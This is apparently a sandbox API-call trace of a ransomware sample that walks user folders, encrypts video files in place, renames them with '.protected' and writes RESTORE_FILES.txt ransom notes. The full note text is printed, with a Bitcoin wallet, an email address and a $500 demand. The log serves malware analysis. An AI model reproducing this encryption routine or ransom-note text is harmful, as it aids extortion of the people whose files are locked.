[0092.847] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4.protected") returned 97 [0092.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4.protected")) returned 1 [0092.848] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Windows") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Program Files") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Program Files (x86)") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="$Recycle.bin") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="System Volume Information") returned 1 [0092.848] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe") returned 69 [0092.848] lstrcmpW (lpString1="ybqFAe", lpString2=".") returned 1 [0092.848] lstrcmpW (lpString1="ybqFAe", lpString2="..") returned 1 [0092.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\*") returned 71 [0092.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\.") returned 71 [0092.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.849] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.849] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.849] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\..") returned 72 [0092.849] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.849] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Windows") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Program Files") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Program Files (x86)") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="$Recycle.bin") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="System Volume Information") returned 1 [0092.849] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.849] StrStrIW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".protected") returned 0x0 [0092.849] lstrcmpW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="RESTORE_FILES.txt") returned 1 [0092.849] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.849] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".txt") returned 0x0 [0092.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".rar") returned 0x0 [0092.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".zip") returned 0x0 [0092.850] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.850] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.851] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.851] CloseHandle (hObject=0x14c) returned 1 [0092.851] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv.protected") returned 102 [0092.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv.protected")) returned 1 [0092.853] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Windows") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Program Files") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Program Files (x86)") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="$Recycle.bin") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="System Volume Information") returned 1 [0092.853] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrIW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".protected") returned 0x0 [0092.853] lstrcmpW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="RESTORE_FILES.txt") returned 1 [0092.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".txt") returned 0x0 [0092.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".rar") returned 0x0 [0092.854] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.854] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".zip") returned 0x0 [0092.854] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.854] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.854] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.855] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.855] CloseHandle (hObject=0x14c) returned 1 [0092.855] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv.protected") returned 100 [0092.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv.protected")) returned 1 [0092.856] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0092.856] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0092.856] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\RESTORE_FILES.txt") returned 87 [0092.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.886] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.886] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0092.886] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.886] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0092.887] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.887] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0092.887] CloseHandle (hObject=0xd8) returned 1 [0092.887] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0092.887] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0092.888] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\RESTORE_FILES.txt") returned 80 [0092.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.888] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.888] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0092.889] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.889] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0092.889] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.889] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0092.889] CloseHandle (hObject=0xd4) returned 1 [0092.890] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1="n-P4N", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N") returned 54 [0092.890] lstrcmpW (lpString1="n-P4N", lpString2=".") returned 1 [0092.890] lstrcmpW (lpString1="n-P4N", lpString2="..") returned 1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\*") returned 56 [0092.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.890] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\.") returned 56 [0092.890] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.890] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.890] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.890] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.890] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\..") returned 57 [0092.890] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.890] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.890] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Windows") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Program Files") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="Program Files (x86)") returned -1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="$Recycle.bin") returned 1 [0092.891] lstrcmpiW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="System Volume Information") returned -1 [0092.891] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\n-P4N\\4Fj2qr6hfnqo.mkv") returned 71 [0092.891] StrStrIW (lpFirst="4Fj2qr6hfnqo.mkv", lpSrch=".protected") returned 0x0 [0092.891] lstrcmpW (lpString1="4Fj2qr6hfnqo.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0092.891] CryptGenRandom (in: 